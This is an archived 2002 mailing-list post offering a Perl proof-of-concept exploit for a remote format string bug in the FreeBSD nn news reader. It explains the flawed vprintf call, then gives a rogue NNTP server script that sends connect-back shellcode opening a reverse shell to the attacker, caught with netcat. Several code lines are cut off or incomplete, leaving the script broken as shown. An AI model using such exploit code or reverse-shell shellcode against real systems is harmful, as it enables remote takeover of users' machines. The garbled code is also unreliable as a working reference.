nn format string exploit

From: zillion (zillionat_private)
Date: Thu Jul 04 2002 - 12:08:09 PDT

  • Next message: Michal Zalewski: "Re: Ports 0-1023?"

    nn PoC exploit for the format string:
    # Remote FreeBSD NN exploit by zillion[at]safemode.org
    # Tested with the 6.3.2 FreeBSD port
    # The nn news reader contains a remote format string bug which
    # allows us to own the nn process and execute code with the
    # privileges of this process.
    # The problem exploited resides in the nn_exitmsg() function that is
    # responsible for printing error messages to the terminal:
    # void nn_exitmsg(int n, char *fmt,...)
    # {
    #     va_list     ap;
    #     va_start(ap, fmt);
    #     vprintf(fmt, ap);
    #     putchar(NL);
    #     va_end(ap);
    #     nn_exit(n);
    #     /*NOTREACHED*/
    # }
    # A server respons such as:
    # 100 AAAABBBB%10\$x%11\$x
    # Results in the client printing:
    # 100 AAAABBBB4141414142424242
    # I included two shellcodes to demonstrate the danger of this
    # vulnerability. One is pretty harmless on prints the following
    # message 222 times on the victims term:
    # "Wha ! wha whaaaa!!!"
    # The other shell code opens a TCP connection and spawns a shell.
    # You can catch it with netcat: nc -l -p 43690 (0xaaaa). Note that
    # the IP address to which this shell is connecting is defined in $b.
    # I'm pretty sure you will have to change it, this might help:
    # perl -e 'printf "0x" . "%02x"x4 ."\n",11,6,12,33'
    use IO::Socket;
    while($_ = $ARGV[0], /^-/) {
        last if /^--$/;
        /^-c/ && do { $shell = 1; };
        /^-m/ && do { $shell = 2; };
    # Connecting back shellcode.  Change the ip in $b to you own and listen
    # with netcat on port 43690 (nc -l -p 43690)
    $a =    "\xeb\x52\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0".
    $b =    "\x0b\x06\x0c\x21";
    $c =    "\x6a\x10\x8d\x46\x07\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\xb1".
    # Write()'s "Wha ! wha whaaaa!!!" to stdout and does an exit()
    $d =    "\xeb\x29\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88".
    # You can easily use other shellcode, such as the one that abuses the
    # sendmail locking problem...
    if($shell == 1) {
       $shellcode = "$a$b$c";
    } elsif($shell == 2) {
       $shellcode = $d;
    } else {
    # Create the buffer with nops and shellcode and the format string to
    # overwrite the exit() GOT section.
    $e =
    # If the connecting nn client is executed without any arguments then this
    # probably will work fine. However, if the client is executed with args
    # then lower 14233 a bit. For example replace it with 14200 or 14210
    $size = 300;
    for ($i = 0; $i < ($size - length($shellcode)); $i++) {
        $buffer .= "\x90";
    $buffer .= $shellcode;
    my $sock = new IO::Socket::INET (
                                  LocalPort => 119,
                                  Proto => 'tcp',
                                  Listen => 1,
                                  Reuse => 1,
                                    ) || die("Cannot bind to port 119!\n");
    # We are ready ...
    while($cl = $sock->accept()) {
    print "Accepted connection!\n";
    sleep 1;
    print $cl "100 $buffer$e\n";
    sleep 2;
    sub usage() {
    print <<TWENTE;
    ***    Remote NN exploit by zillion    ***
    Connect: $0 -c
    Message: $0 -m
      Read this file for more information

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